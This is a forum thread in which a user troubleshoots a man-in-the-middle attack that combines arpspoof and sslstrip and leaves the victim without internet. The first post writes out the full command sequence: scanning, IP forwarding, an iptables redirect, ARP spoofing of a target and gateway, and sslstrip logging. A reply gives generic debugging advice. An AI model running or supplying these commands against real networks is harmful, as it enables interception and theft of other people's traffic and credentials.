Jump to content

sslstrip with arpsoof: victim ends up w/ no internet


echemmon

Recommended Posts

Hello

OK so when I do sslstrip and try to make it work with arpsoof the victim's internet stops working. Like the pages won't load. Anybody else ever had that issue?

I did exactly:

nmap -sn <gatewayIP>/24
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port <listenPort>
arpspoof -i <interface> -t <targetIP> -r <gatewayIP>

sslstrip -l <listenPort>

tail -f sslstrip.log

and btw I used 8080 for listenPort but I don't think that matters.

Anywho, if somebody knows what's the problem - any advice would be very appreciated.

Link to comment
Share on other sites

Why obfuscate your commands? Without seeing what you are actually doing and the network structure then it is hard to say what you've done wrong.

Drop the iptables and sslstrip, does everything work? That will give you a clue where the problem is.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...